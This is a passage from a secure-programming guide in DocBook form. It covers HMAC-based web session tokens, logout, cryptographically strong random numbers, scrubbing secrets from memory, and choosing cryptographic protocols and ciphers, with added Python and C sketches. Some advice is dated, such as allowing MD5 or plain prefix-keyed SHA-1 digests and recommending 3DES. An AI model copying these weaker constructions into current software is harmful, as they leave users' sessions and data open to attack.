A separate authentication token is used, so that users don't need to keep
logging in, so that passwords aren't continually sent back and forth, and
so that unencrypted communication can be used if desired.
A suggested token (ignoring session fixation attacks) would look like this:
<programlisting>
  exp=t&amp;data=s&amp;digest=m
</programlisting>
Where t is the expiration time of the token (say, in several hours),
and data s identifies the user (say, the user name or session id).
The digest is a keyed digest of the other fields.
Feel free to change the field name of ``data'' to be more descriptive
(e.g., username and/or sessionid).
If you have more than one field of data (e.g., both a username and a
sessionid), make sure the digest uses both the field names and data values
of all fields you're authenticating; concatenate them with a pattern
(say ``%%'', ``+'', or ``&amp;'')
that can't occur in any of the field data values.
As described in a moment, it would be a good idea to include a username.
The keyed digest should be a cryptographic hash of the other information in
the token, keyed using a different server key2.
The keyed digest should use HMAC-MD5 or HMAC-SHA1, using a different server
key (key2), though simply using SHA1 might be okay for some purposes
(or even MD5, if the risks are low).
Key2 is subject to brute force guessing attacks, so it should be
long (say 12+ characters) and unguessable; it does NOT need to be easily
remembered.
If this key2 is compromised, anyone can authenticate to the server, but
it's easy to change key2 - when you do, it'll simply force currently
``logged in'' users to re-authenticate.
See Fu [2001] for more details.
</para>

<para>
There is a potential weakness in this approach.
I have concerns that Fu's approach, as originally described, is weak against
session fixation attacks (from several different directions, which
I don't want to get into here).
Thus, I now suggest modifying Fu's approach and using this token format
instead:
<programlisting>
  exp=t&amp;data=s&amp;client=c&amp;digest=m
</programlisting>
This is not the same as the original Fu approach, and older versions of
this book (before December 2002) didn't suggest it.
This modification adds a new
"client" field to uniquely identify the client's current location/identity.
The data in the client field should be something that should change
if someone else tries to use the account; ideally, its new value should be
unguessable, though that's hard to accomplish in practice.
Ideally the client field would be the client's SSL client certificate,
but currently that's a suggestion that is hard to follow.
At the least, it should be the user's IP address (as perceived from
the server, and remember to plan for IPv6's longer addresses).
This modification doesn't completely counter session fixation attacks,
unfortunately (since if an attacker can determine what the user
would send, the attacker may be able to make a request to a server
and convince the client to accept those values).
However, it does add resistance to the attack.
Again, the digest must now include all the other data.
</para>

<para>
Here's an example.
If a user logs into foobar.com successfully, you might establish
the expiration date as 2002-12-30T1800 (let's assume we'll transmit as
ASCII text in this format for the moment), the username as "fred",
the client session as "1234", and you might determine that the
client's IP address was 5.6.7.8.
If you use a simple SHA-1 keyed digest
(and use a key prefixing the rest of the data), with the server key2 value of
"rM!V^m~v*Dzx", the digest could be computed over:
<programlisting>
 exp=2002-12-30T1800&amp;user=fred&amp;session=1234&amp;client=5.6.7.8
</programlisting>
A keyed digest can be computed by running a cryptographic hash function
over, say, the server key2, then the data;
in this case, the digest would be:
<programlisting>
101cebfcc6ff86bc483e0538f616e9f5e9894d94
</programlisting>
</para>
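
<para>
The computation in this example can be sketched as follows.
The exact bytes that were hashed to obtain the digest shown above are not
spelled out (for instance, whether any separator follows the key), so this
sketch simply hashes the key immediately followed by the data, and its
result may differ from the value printed above.
<programlisting><![CDATA[
```python
import hashlib

# Values taken from the example in the text.
key2 = "rM!V^m~v*Dzx"
data = "exp=2002-12-30T1800&user=fred&session=1234&client=5.6.7.8"

# Simple prefix-keyed SHA-1: hash the server key followed by the data.
digest = hashlib.sha1((key2 + data).encode("ascii")).hexdigest()

# The complete token sent to the client.
token = data + "&digest=" + digest
```
]]></programlisting>
</para>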

<para>
From then on, the server must check the expiration time and recompute the
digest of this authentication token, and only accept client requests
if the digest is correct.
If there's no token, the server should reply with the user login page
(with a hidden form field to show where the successful login should go
afterwards).
</para>
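
<para>
A minimal sketch of issuing and checking such a token follows.
It uses HMAC-SHA1 keyed with server key2, as suggested earlier, and the
token format with the ``client'' field.
The function names, the key value, the one-hour lifetime, and the use of
Unix seconds for the expiration time are assumptions for this example.
<programlisting><![CDATA[
```python
import hashlib
import hmac
import time
from urllib.parse import parse_qsl, urlencode

# Hypothetical value; use a long, unguessable key in practice.
SERVER_KEY2 = b"replace-with-a-long-unguessable-key"


def _digest(fields):
    """Keyed digest over the field names and values, in order."""
    message = urlencode(fields).encode("ascii")
    return hmac.new(SERVER_KEY2, message, hashlib.sha1).hexdigest()


def make_token(user, client, lifetime_seconds=3600, now=None):
    """Build exp=...&data=...&client=...&digest=... for a logged-in user."""
    now = int(time.time()) if now is None else now
    fields = [("exp", str(now + lifetime_seconds)),
              ("data", user),
              ("client", client)]
    return urlencode(fields + [("digest", _digest(fields))])


def verify_token(token, client, now=None):
    """Return the user name if the token is valid, otherwise None."""
    now = int(time.time()) if now is None else now
    pairs = parse_qsl(token, keep_blank_values=True)
    if [name for name, _ in pairs] != ["exp", "data", "client", "digest"]:
        return None
    fields, (_, digest) = pairs[:3], pairs[3]
    # Recompute the digest and compare in constant time.
    expected = _digest(fields).encode("ascii")
    if not hmac.compare_digest(digest.encode("utf-8"), expected):
        return None
    exp, user, token_client = (value for _, value in fields)
    if not (exp.isascii() and exp.isdigit()) or int(exp) < now:
        return None
    if token_client != client:
        return None
    return user
```
]]></programlisting>
A request whose token yields None would be answered with the login page.
</para>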

<para>
It would be prudent to display the username, especially on important
screens, to help counter session fixation attacks.
If users are given feedback on their username, they may notice if they
don't have their expected username.  This is helpful anyway if it's
possible to have an unexpected username (e.g., a family that shares the
same machine).
Examples of important screens include those when a file is uploaded
that should be kept private.
</para>

<para>
One odd implementation issue: although the specifications for the
"Expires:" (expiration time) field for cookies
permit time zones, it turns out that some versions of
Microsoft's Internet Explorer don't implement time zones correctly
for cookie expiration.
Thus, you need to always use UTC time (also called Zulu time)
in cookie expiration times for maximum portability.
<!-- http://lwn.net/Articles/11981/ -->
It's a good idea in general to use UTC time for time values,
and convert when necessary for human display, since this eliminates other
time zone and daylight savings time issues.
</para>
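
<para>
For instance, an expiration time can be formatted in UTC with Python's
standard email.utils.formatdate function, as in this sketch (the helper
name and its parameters are assumptions for the example):
<programlisting><![CDATA[
```python
import time
from email.utils import formatdate


def cookie_expires(seconds_from_now, now=None):
    """Format an expiration time in UTC, ending in 'GMT'."""
    now = time.time() if now is None else now
    return formatdate(now + seconds_from_now, usegmt=True)


# One hour after the Unix epoch, to keep the example reproducible.
expires = cookie_expires(3600, now=0.0)
```
]]></programlisting>
</para>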

<para>
If you include a sessionid in the authentication token, you can limit
access further.
Your server could ``track'' what pages a user has seen in a given session,
and only permit access to other appropriate pages from that point
(e.g., only those directly linked from those page(s)).
For example,
if a user is granted access to page foo.html, and page foo.html has
pointers to resources bar1.jpg and bar2.png, then accesses to bar4.cgi
can be rejected.
You could even kill the session, though only do this if the authentication
information is valid (otherwise, this would make it possible for
attackers to cause denial-of-service attacks on other users).
This would somewhat limit the access an attacker has, even if they
successfully hijack a session, though clearly an attacker with time
and an authentication token
could ``walk'' the links just as a normal user would.
</para>
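
<para>
The page-tracking idea can be sketched as below.
The class name and the dictionary mapping each page to the resources it
links to are hypothetical; a real server would derive the links from its
own pages and keep one such record per sessionid.
<programlisting><![CDATA[
```python
class SessionLinks:
    """Track which resources a session may request next."""

    def __init__(self, start_page):
        self.allowed = {start_page}

    def request(self, page, links_on_page):
        """Permit the request only if the page was linked from a page seen."""
        if page not in self.allowed:
            return False
        # The resources linked from this page become reachable.
        self.allowed.update(links_on_page.get(page, ()))
        return True


# Hypothetical link map matching the example in the text.
site_links = {"foo.html": ["bar1.jpg", "bar2.png"]}
session = SessionLinks("foo.html")
```
]]></programlisting>
</para>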

<para>
One decision is whether or not to require the authentication token and/or
data to be sent over a secure connection (e.g., SSL).
If you send an authentication token
in the clear (non-secure), someone who intercepts the
token could do whatever the user could do until the expiration time.
Also, when you send data over an unencrypted link, there's the risk of
unnoticed change by an attacker; if you're worried that someone might change the
data on the way, then you need to authenticate the data being transmitted.
Encryption by itself doesn't guarantee authentication, but it does make
corruption more likely to be detected, and typical libraries can support
both encryption and authentication in a TLS/SSL connection.
In general, if you're encrypting a message, you should also authenticate it.
If your needs vary,
one alternative is to create two authentication tokens - one is used
only in a ``secure'' connection for important operations, while the other
is used for less-critical operations.
Make sure the token used for ``secure'' connections is marked so that only
secure connections (typically encrypted SSL/TLS connections) are used.
If users aren't really different, the authentication token could omit
the ``data'' entirely.
</para>

<para>
Again, make sure that the pages with this authentication token aren't cached.
There are other reasonable schemes also; the goal of this text is
to provide at least one secure solution.
Many variations are possible.
</para>

</sect2>

<sect2 id="web-authentication-logout">
<title>Authenticating on the Web: Logging Out</title>
<para>
You should always provide users with a mechanism to ``log out'' - this
is especially helpful for customers using shared browsers
(say at a library).
Your ``logout'' routine's task is simple - just unset the client's
authentication token.
</para>
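<para>
One common way to unset a cookie is to send a cookie of the same name
with an empty value and an expiration time in the past.
The following sketch assumes the token lives in a cookie named ``auth''
with path ``/''; both are assumptions for this example, and must match
whatever was used when the cookie was set.
<programlisting><![CDATA[
```python
from http.cookies import SimpleCookie


def logout_cookie_header(name="auth"):
    """Return a Set-Cookie value that tells the browser to drop the token."""
    cookie = SimpleCookie()
    cookie[name] = ""
    cookie[name]["path"] = "/"
    cookie[name]["expires"] = "Thu, 01 Jan 1970 00:00:00 GMT"
    cookie[name]["max-age"] = 0
    return cookie[name].OutputString()


header_value = logout_cookie_header()
```
]]></programlisting>
</para>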
</sect2>

</sect1>

<sect1 id="random-numbers">
<title>Random Numbers</title>

<para>
In many cases secure programs must generate ``random'' numbers that
cannot be guessed by an adversary.
Examples include session keys, public or private keys, symmetric keys,
nonces and IVs used in many protocols, salts, and so on.
Ideally, you should use a truly random source of data for random numbers,
such as values based on
radioactive decay (through precise timing of Geiger counter
clicks), atmospheric noise, or thermal noise in electrical circuits.
Some computers have a hardware component that functions as
a real random value generator, and if it's available you should use it.
</para>

<para>
However, most computers don't have hardware that generates truly
random values, so in most cases you need a way to generate random numbers
that is sufficiently random that an adversary can't predict it.
In general, this means that you'll need three things:
<itemizedlist>
<listitem><para>
An ``unguessable'' state; typically this is done by measuring
variances in timing of low-level devices
(keystrokes, disk drive arm jitter, etc.)
in a way that an adversary cannot control.
</para></listitem>
<listitem><para>
A cryptographically strong pseudo-random number generator (PRNG), which
uses the state to generate ``random'' numbers.
</para></listitem>
<listitem><para>
A large number of bits (in both the seed and the resulting value used).
There's no point in having a strong PRNG if you only have a few possible values,
because this makes it easy for an attacker to use brute force attacks.
The number of bits necessary varies depending on the circumstance; however,
since these values are often used as cryptographic keys, the normal rules of
thumb for keys apply.
For a symmetric key (result), I'd use at least 112 bits (3DES); 128 bits is
a little better, and 160 bits or more is even safer.
</para></listitem>
</itemizedlist>
Typically the PRNG uses the state to generate some values, and then
some of its values and other unguessable inputs are used to update the state.
There are lots of ways to attack these systems.
For example, if an attacker can control or view inputs to the state
(or parts of it), the attacker may be able
to determine your supposedly ``random'' number.
</para>

<para>
A real danger with PRNGs is that most computer language libraries include
a large set of pseudo-random number generators (PRNGs)
which are <emphasis>inappropriate</emphasis> for security purposes.
Let me say it again:
<emphasis>do not use typical random number generators for security
purposes</emphasis>.
Typical library PRNGs
are intended for use in simulations, games, and so on; they are
<emphasis remap="it">not</emphasis> sufficiently random for use
in security functions such as key generation.
Most non-cryptographic
library PRNGs are some variation of ``linear congruential generators'',
where the ``next'' random value is computed as "(aX+b)&nbsp;mod&nbsp;m"
(where X is the previous value).
Good linear congruential generators are fast and have useful statistical
properties, making them appropriate for their intended uses.
The problem with such PRNGs is that future values can be easily deduced
by an attacker (though they may appear random).
Other algorithms for generating random numbers quickly, such as
quadratic generators and cubic generators, have also been broken
[Schneier 1996].
In short, you have to use cryptographically strong PRNGs to
generate random numbers in secure applications - ordinary random number
libraries are not sufficient.
</para>
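
<para>
To make the weakness concrete, here is a minimal sketch of why a
linear congruential generator is predictable.
The constants and the function names lcg_next() and attacker_predict()
are illustrative assumptions, not taken from any particular library;
the point is only that anyone who sees one output and knows the
(public) constants can compute the next output without knowing the seed.
<programlisting><![CDATA[
```c
#include <stdint.h>

/* Hypothetical LCG constants for "(a*X + b) mod m" with m = 2^32.
   They are illustrative only. */
#define LCG_A 1664525u
#define LCG_B 1013904223u

/* One step of the generator.  uint32_t arithmetic wraps modulo 2^32,
   which supplies the "mod m". */
uint32_t lcg_next(uint32_t x)
{
    return LCG_A * x + LCG_B;
}

/* What an attacker does: given ONE observed output and the public
   constants, compute the following output.  No seed is needed. */
uint32_t attacker_predict(uint32_t observed)
{
    return LCG_A * observed + LCG_B;
}
```
]]></programlisting>
Library generators that return only part of their internal state take
a little more work to predict, but the underlying problem is the same.
</para>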

<para>
Failing to correctly generate truly random values for keys has caused
a number of problems, including holes in Kerberos,
the X window system, and NFS [Venema 1996].
</para>

<para>
If possible, you should use system services
(typically provided by the operating system) that are expressly designed
to create cryptographically secure random values.
For example,
the Linux kernel (since 1.3.30) includes a random number generator, which
is sufficient for many security purposes.
This random number generator gathers environmental noise
from device drivers and other sources into an entropy pool.
When accessed as /dev/random, random bytes are only returned
within the estimated number of bits of noise in the entropy pool
(when the entropy pool is empty, the call blocks until additional
environmental noise is gathered).
When accessed as /dev/urandom, as many bytes as are requested are
returned even when the entropy pool is exhausted.
If you are using the random values for cryptographic purposes (e.g.,
to generate a key) on Linux, use /dev/random.
*BSD systems also include /dev/random.
Solaris users with the SUNWski package also have /dev/random.
Note that if a hardware random number generator is available and its
driver is installed, it will be used instead.
More information is available in the system documentation random(4).
</para>
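
<para>
Reading from these devices takes only a few lines of C.
The following is a sketch, not a definitive implementation; the
function name read_random_bytes() is my own, and the device path is
a parameter so the caller decides which device to use.
<programlisting><![CDATA[
```c
#include <stdio.h>
#include <stddef.h>

/* Fill buf with n bytes from a kernel random device such as
   "/dev/random" or "/dev/urandom".
   Returns 0 on success, -1 on any failure (the caller must then
   NOT use the buffer as a key). */
int read_random_bytes(const char *device, unsigned char *buf, size_t n)
{
    FILE *f = fopen(device, "rb");
    size_t got;

    if (f == NULL)
        return -1;
    /* Unbuffered, so stdio does not read more bytes than requested. */
    setvbuf(f, NULL, _IONBF, 0);
    got = fread(buf, 1, n, f);
    fclose(f);
    return (got == n) ? 0 : -1;
}
```
]]></programlisting>
A caller generating a 128-bit key would pass a 16-byte buffer and check
the return value before using the result; note that a read from
/dev/random may block until enough noise has been gathered.
</para>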

<para>
On other systems, you'll need to find another way to get truly random results.
One possibility for other Unix-like systems
is the Entropy Gathering Daemon (EGD), which monitors system
activity and hashes it into random values; you can get it at
<ulink url="http://www.lothar.com/tech/crypto">http://www.lothar.com/tech/crypto</ulink>.
You might consider using a
cryptographic hash function (e.g., SHA-1) on PRNG outputs.
That way, even if the PRNG turns out to be guessable,
the attacker must also break the hash function.
</para>

<para>
If you have to implement a strong PRNG yourself,
a good choice for a cryptographically strong (and patent-unencumbered)
PRNG is the Yarrow algorithm; you can learn more about Yarrow from
<ulink url="http://www.counterpane.com/yarrow.html">http://www.counterpane.com/yarrow.html</ulink>.
Some other PRNGs can be useful, but many widely-used ones
have known weaknesses that may or may not matter depending on your application.
Before implementing a PRNG yourself, consult the literature, such as
[Kelsey 1998] and [McGraw 2000a].
You should also examine
<ulink url="http://www.ietf.org/rfc/rfc1750.txt">IETF RFC 1750</ulink>.
NIST has some useful information; see the
<ulink url="http://csrc.nist.gov/publications/nistpubs/800-22/sp-800-22-051501.pdf">NIST publication 800-22</ulink> and
<ulink url="http://csrc.nist.gov/publications/nistpubs/800-22/errata-sheet.pdf">NIST errata</ulink>.
You should know about the
<ulink url="http://stat.fsu.edu/~geo/diehard.html">diehard tests</ulink> too.
You might want to examine
the paper titled
<!-- http://www.cryptonomicon.net/links.php?op=visit&amp;lid=406 -->
"how Intel checked its PRNG", but unfortunately that paper appears to be
unavailable now.
</para>

</sect1>

<sect1 id="protect-secrets">
<title>Specially Protect Secrets (Passwords and Keys) in User Memory</title>
<para>
If your application must handle passwords or non-public keys
(such as session keys, private keys, or secret keys), try to hide them
and overwrite them immediately after using them so they have minimal exposure.
</para>

<para>
Systems such as Linux support the mlock() and mlockall() calls to
keep memory from being paged to disk (since someone might acquire the
key later from the swap file).
Note that on Linux this is a privileged system call, which causes its
own issues (do I grant the program superuser privileges so it can call
mlock, if it doesn't need them otherwise?).
</para>

<para>
Also, if your program handles such secret values, be sure to disable creating
core dumps (via ulimit).  Otherwise, an attacker may be able to halt the
program and find the secret value in the data dump.
</para>
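
<para>
A program can also disable core dumps for itself instead of relying on
the invoking shell's ulimit setting.
Here is a minimal sketch using the setrlimit(2) call; the function name
disable_core_dumps() is my own.
<programlisting><![CDATA[
```c
#include <sys/resource.h>

/* Set both the soft and hard core-file size limits to zero, so this
   process (and any children it creates afterwards) cannot write a
   core dump.  Returns 0 on success, -1 on failure (errno is set). */
int disable_core_dumps(void)
{
    struct rlimit rl;

    rl.rlim_cur = 0;
    rl.rlim_max = 0;
    return setrlimit(RLIMIT_CORE, &rl);
}
```
]]></programlisting>
Call this early, before the program reads any secret, and treat a
failure as a reason to stop.
</para>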

<para>
Beware - normally processes can monitor other processes through
the calls for debuggers (e.g., via ptrace(2) and the /proc pseudo-filesystem)
[Venema 1996].
Kernels usually protect against these monitoring routines if the process is
setuid or setgid
(on the few ancient ones that don't, there really isn't a good way to
defend yourself other than upgrading).
Thus, if your process manages secret values, you probably should make it
setgid or setuid (to a different unprivileged group or user) to forcibly
inhibit this kind of monitoring.
Unless you need it to be setuid, use setgid (since this grants fewer
privileges).
</para>


<para>
Then there's the problem of being able to actually overwrite the value, which
often becomes language and compiler specific.
In many languages, you need to make sure that you store
such information in mutable locations, and then overwrite those locations.
For example,
in Java, don't use the type String to store a password because Strings are
immutable (they will not be overwritten until garbage-collected and
then reused, possibly far in the future).
Instead, in Java use char[] to store a password, so it can be
immediately overwritten.
In Ada, use type String (an array of characters),
and not type Unbounded_String, to make sure
that you have control over the contents.
</para>

<para>
In many languages (including C and C++),
be careful that the compiler doesn't optimize away the "dead code"
for overwriting the value - since in this case it's not dead code.
Many compilers, including many C/C++ compilers, remove writes
to stores that are no longer used - this is often referred to as
"dead store removal."
Unfortunately, if the write is really to overwrite the value of a secret,
this means that code that appears to be correct will be silently discarded.
Ada provides the pragma Inspection_Point; place this after the
code erasing the memory, and that way you can be certain that
the object containing the secret will really be erased
(and that the overwriting won't be optimized away).
</para>

<para>
<!-- "When scrubbing secrets doesn't work" discusses this in Bugtraq
     November 2002, but this is actually a really old issue that keeps
     re-surfacing.
-->
A Bugtraq post by Andy Polyakov (November 7, 2002) reported that
the C/C++ compilers gcc version 3 or higher, SGI MIPSpro, and the Microsoft
compilers eliminated simple inlined calls to memset
intended to overwrite secrets.
This is allowed by the C and C++ standards.
Other C/C++ compilers (such as gcc less than version 3) preserved the inlined
call to memset at all optimization levels, showing that the issue
is compiler-specific.
Simply declaring that the destination data is volatile doesn't
help on all compilers; both the MIPSpro and Microsoft compilers
ignored simple "volatilization".
Simply "touching" the first byte of the secret data doesn't help either;
he found that the MIPSpro and GCC>=3 cleverly nullify only the first byte
and leave the rest intact (which is actually quite clever - the problem
is that the compiler's cleverness is interfering with our goals).
One approach that
seems to work on all platforms is to
write your own implementation of memset with internal "volatilization"
of the first argument (this code is based on a
<ulink url="http://online.securityfocus.com/archive/82/298061/2002-10-27/2002-11-02/0">workaround proposed by Michael Howard</ulink>):
<programlisting>
 void *guaranteed_memset(void *v,int c,size_t n)
  { volatile char *p=v; while (n--) *p++=c; return v; }
</programlisting>
Then place this definition into an external file to force the function to
be external (declare the function in a corresponding .h file, and #include
that file in the callers, as is usual).
This approach appears to be safe
at any optimization level (even if the function gets inlined).
</para>
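
<para>
As a usage sketch, here is how a caller might scrub a local buffer
with a volatile-pointer memset of this kind.
The function is repeated so the example is self-contained;
login_attempt() and check_password() are hypothetical stand-ins for
whatever the real program does with the secret.
<programlisting><![CDATA[
```c
#include <stddef.h>
#include <string.h>

/* Volatile-pointer memset, repeated here for self-containment. */
void *guaranteed_memset(void *v, int c, size_t n)
{
    volatile char *p = v;
    while (n--)
        *p++ = (char)c;
    return v;
}

/* Hypothetical check; a real program would verify a hash instead. */
static int check_password(const char *pw)
{
    return strcmp(pw, "example") == 0;
}

/* Copies the typed password into a local buffer, uses it, and scrubs
   the buffer on the way out, whether or not the check succeeded. */
int login_attempt(const char *typed)
{
    char secret[64];
    int ok;

    strncpy(secret, typed, sizeof secret - 1);
    secret[sizeof secret - 1] = '\0';
    ok = check_password(secret);
    guaranteed_memset(secret, 0, sizeof secret);
    return ok;
}
```
]]></programlisting>
The scrub happens on every path out of the function; a secret that is
erased only on the success path is still exposed after a failure.
</para>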

</sect1>

<sect1 id="crypto">
<title>Cryptographic Algorithms and Protocols</title>

<para>
Often cryptographic algorithms and protocols are necessary to keep
a system secure, particularly when communicating through an untrusted
network such as the Internet.
Where possible, use cryptographic techniques to authenticate information and
keep the information private
(but don't assume that simple encryption automatically authenticates as well).
Generally you'll need to use a suite of available tools to
secure your application.
</para>

<para>
For background information and code, you should probably look at
the classic text ``Applied Cryptography'' [Schneier 1996].
The newsgroup ``sci.crypt'' has a series of FAQ's; you can find them
at many locations, including
<ulink url="http://www.landfield.com/faqs/cryptography-faq">http://www.landfield.com/faqs/cryptography-faq</ulink>.
Linux-specific resources include the Linux Encryption HOWTO at
<ulink
url="http://marc.mutz.com/Encryption-HOWTO/">http://marc.mutz.com/Encryption-HOWTO/</ulink>.
A discussion on how protocols use the basic algorithms can be
found in [Opplinger 1998].
A useful collection of papers on how to apply cryptography in
protocols can be found in [Stallings 1996].
What follows here is just a few comments; these areas are rather
specialized and covered more thoroughly elsewhere.
</para>

<para>
Cryptographic protocols and algorithms are difficult to get right,
so do not create your own.
Instead, where you can, use protocols and algorithms that are
widely-used, heavily analyzed, and accepted as secure.
When you must create anything, give the approach wide public review and
make sure that professional security analysts examine it for problems.
In particular, do not create your own encryption algorithms unless you are
an expert in cryptology, know what you're doing, and plan to spend
years in professional review of the algorithm.
Creating encryption algorithms (that are any good) is a task for experts only.
</para>


<para>
A number of algorithms are patented; even if the owners permit
``free use'' at the moment, without a signed contract they can always
change their minds later, putting you at extreme risk.
In general, avoid all patented algorithms -
in most cases there's an unpatented approach that is at least as good
or better technically, and by doing so you avoid a large number
of legal problems.
</para>

<para>
Another complication is that many countries regulate or restrict
cryptography in some way.
A survey of legal issues is available at the ``Crypto Law Survey'' site,
<ulink url="http://rechten.kub.nl/koops/cryptolaw/">http://rechten.kub.nl/koops/cryptolaw/</ulink>.
</para>

<para>
Often, your software should provide a way to
reject ``too small'' keys, and let the user set what ``too small'' is.
For RSA keys, 512 bits is too small for use.
There is increasing evidence that
1024 bits for RSA keys is not enough either;
Bernstein has suggested techniques that simplify brute-forcing RSA, and
other work based on it
(such as Shamir and Tromer's "Factoring Large Numbers with the TWIRL device")
now suggests that 1024 bit keys can be broken in a year
by a $10 Million device.
You may want to
make 2048 bits the minimum for RSA if you really want a secure system,
and you should certainly do so if you plan to use those keys after 2015.
For more about RSA specifically, see
<ulink url="http://www.rsasecurity.com/rsalabs/technotes/bernstein.html">RSA's
commentary on Bernstein's work</ulink>.
For a more general discussion of key length and other general
cryptographic algorithm issues, see
<ulink url="http://csrc.nist.gov/encryption/kms/key-management-guideline-(workshop).pdf">NIST's key management workshop in November 2001</ulink>.
</para>
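
<para>
A check for ``too small'' keys can be very simple.
The sketch below is one way to do it; the function name, the
2048-bit default, and the 1024-bit hard floor (below which the user's
setting is ignored) are my assumptions for illustration.
<programlisting><![CDATA[
```c
/* Assumed policy values for this sketch. */
#define RSA_HARD_FLOOR_BITS  1024   /* never accept less than this */
#define RSA_DEFAULT_MIN_BITS 2048   /* used when the user sets nothing */

/* Returns 1 if an RSA key of key_bits is acceptable, 0 if it is
   "too small".  user_min_bits is the user's configured minimum;
   pass 0 to use the default. */
int rsa_key_size_ok(int key_bits, int user_min_bits)
{
    int min_bits = (user_min_bits > 0) ? user_min_bits
                                       : RSA_DEFAULT_MIN_BITS;

    if (min_bits < RSA_HARD_FLOOR_BITS)
        min_bits = RSA_HARD_FLOOR_BITS;
    return key_bits >= min_bits;
}
```
]]></programlisting>
The hard floor keeps a careless configuration from re-enabling
512-bit keys.
</para>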

<sect2 id="crypto-protocols">
<title>Cryptographic Protocols</title>

<para>
When you need a security protocol, try to use standard-conforming protocols
such as IPSec, SSL (soon to be TLS), SSH, S/MIME, OpenPGP/GnuPG/PGP,
and Kerberos.
Each has advantages and disadvantages;
many of them overlap somewhat in functionality, but each tends to be
used in different areas:

<itemizedlist>
<listitem>
<para>
Internet Protocol Security (IPSec).
IPSec provides encryption and/or authentication at the IP packet level.
However, IPSec is often used in a way that
only guarantees authenticity of two
communicating hosts, not of the users.
As a practical matter, IPSec usually requires low-level support
from the operating system (which not all implement) and
an additional keyring server that must be configured.
Since IPSec can be used as a "tunnel" to secure packets belonging to
multiple users and multiple hosts, it is especially useful for
building a Virtual Private Network (VPN) and connecting a remote machine.
As of this time, it is much less often used to secure communication
from individual clients to servers.
The new version of the Internet Protocol, IPv6, comes with
IPSec ``built in,'' but IPSec also works with the more common IPv4 protocol.
Note that if you use IPSec, don't use the encryption mode without the
authentication, because the authentication also acts as
integrity protection.
</para>
</listitem>

<listitem>
<para>
Secure Socket Layer (SSL) / TLS.
SSL/TLS works over TCP and tunnels other protocols using TCP, adding
encryption, authentication of the server, and optional authentication
of the client (but authenticating clients using SSL/TLS requires
that clients have configured X.509 client certificates, something
rarely done).
SSL version 3 is widely used; TLS is a later adjustment to SSL that
strengthens its security and improves its flexibility.
Currently there is a slow transition going on from SSLv3 to TLS, aided
because implementations can easily try to use TLS and then back off to SSLv3
without user intervention.
Unfortunately, a few bad SSLv3 implementations cause problems with the
backoff, so you may need a preferences setting to allow users to skip
using TLS if necessary.
Don't use SSL version 2; it has some serious security weaknesses.
</para>
<para>
SSL/TLS is the primary method for protecting http (web) transactions.
Any time you use an "https://" URL, you're using SSL/TLS.
Other protocols that often use SSL/TLS include POP3 and IMAP.
SSL/TLS usually uses a separate TCP/IP port
number from the unsecured port, which the IETF is a little unhappy about
(because it consumes twice as many ports; there are solutions to this).
SSL is relatively easy to use in programs, because
most library implementations allow programmers to use operations
similar to the operations on standard sockets like
SSL_connect(), SSL_write(), SSL_read(), etc.
A widely used OSS/FS implementation of SSL (as well as other capabilities)
is OpenSSL, available at
<ulink url="http://www.openssl.org">http://www.openssl.org</ulink>.
</para>
</listitem>

<listitem>
<para>
OpenPGP and S/MIME.
There are two competing, essentially incompatible standards for
securing email: OpenPGP and S/MIME.
OpenPGP is based on the PGP application; an OSS/FS implementation is
GNU Privacy Guard from
<ulink url="http://www.gnupg.org">http://www.gnupg.org</ulink>.
Currently, their certificates are often not interchangeable;
work is ongoing to repair this.
</para>
</listitem>

<listitem>
<para>
SSH.
SSH is the primary method of securing ``remote terminals'' over an
internet, and it also includes methods for
tunneling X Windows sessions.
However, it's been extended to support single sign-on and
general secure tunneling for TCP streams, so it's often
used for securing other data streams too (such as CVS accesses).
The most popular implementation of SSH is OpenSSH
<ulink url="http://www.openssh.com">http://www.openssh.com</ulink>,
which is OSS/FS.
Typical use of SSH allows the client to authenticate that the
server is truly the server, and
then the user enters a password to authenticate the user
(the password is encrypted and sent to the other system for verification).
Current versions of SSH can store private keys, allowing users to not
enter the password each time.
To prevent man-in-the-middle attacks, SSH records keying information
about servers it talks to; that means that typical use of
SSH is vulnerable to a man-in-the-middle attack during the
very first connection, but it can detect problems afterwards.
In contrast, SSL generally uses a certificate authority, which eliminates
the first connection problem but requires special setup (and payment!) to
the certificate authority.
</para>
</listitem>


<listitem>
<para>
Kerberos.
Kerberos is a protocol for single sign-on and authenticating users
against a central authentication and key distribution server. Kerberos
works by giving authenticated users "tickets", granting them access to
various services on the network.
When clients then contact servers, the servers can verify the tickets.
Kerberos is a primary method for securing and supporting authentication
on a LAN, and for establishing shared secrets (thus, it needs to be
used with other algorithms for the actual protection of communication).
Note that to use Kerberos, both the client and server have to include
code to use it, and since not everyone has a Kerberos setup, this has
to be optional - complicating the use of Kerberos in some programs.
However, Kerberos is widely used.
</para>
</listitem>

</itemizedlist>
</para>


<para>
Many of these protocols allow you to select a number of different
algorithms, so you'll still need to pick reasonable defaults for
algorithms (e.g., for encryption).
</para>

</sect2>

<sect2 id="symmetric-encryption">
<title>Symmetric Key Encryption Algorithms</title>

<para>
The use, export, and/or import of implementations of
encryption algorithms are restricted in many countries, and the laws
can change quite rapidly.
Find out what the rules are before trying to build applications using
cryptography.
</para>

<para>
For secret key (bulk data) encryption algorithms,
use only encryption algorithms that have been openly published and withstood
years of attack, and check on their patent status.
I would recommend using the
new Advanced Encryption Standard (AES), also known as Rijndael --
a number of cryptographers have analyzed it and not found any serious weakness
in it, and I believe it has been through enough analysis
to be trustworthy now.
However, in August 2002
researchers Fuller and Millar
discovered a mathematical property of the cipher that,
while not an attack, might be exploitable into an attack
(the approach may actually have serious consequences for some other
algorithms, too).
Thus, it's worth staying tuned to future work.
<!--
AES property - Abstract is here:
http://eprint.iacr.org/2002/111/
Full report (postscript) written by Fuller, J, & Millar, M.  (Aug, 2002):
http://eprint.iacr.org/2002/111.ps
-->
A good alternative to AES is the Serpent algorithm, which is slightly slower
but is very resistant to attack.
For many applications triple-DES is a very good encryption algorithm; it
has a reasonably lengthy key (112 bits), no patent issues, and
a very long history of withstanding attacks (it's withstood attacks far
longer than any other encryption algorithm with reasonable key length in the
public literature, so it's probably the safest publicly-available
symmetric encryption algorithm when properly implemented).
However, triple-DES is very slow when implemented in software, so
triple-DES can be considered ``safest but slowest.''
Twofish appears to be a good encryption algorithm, but there are some
lingering questions - Sean Murphy and Fauzan Mirza showed that Twofish
has properties that cause many academics to be concerned (though as of yet
no one has managed to exploit these properties).
MARS is highly resistant to ``new and novel'' attacks, but it's more complex
and is impractical on small-ability smartcards.
For the moment I would avoid Twofish - it's quite likely that this will never
be exploitable, but it's hard to be sure and there are alternative
algorithms which don't have these concerns.
Don't use IDEA - it's subject to U.S. and European patents.
Don't use stupid algorithms such as XOR with a constant or constant string,
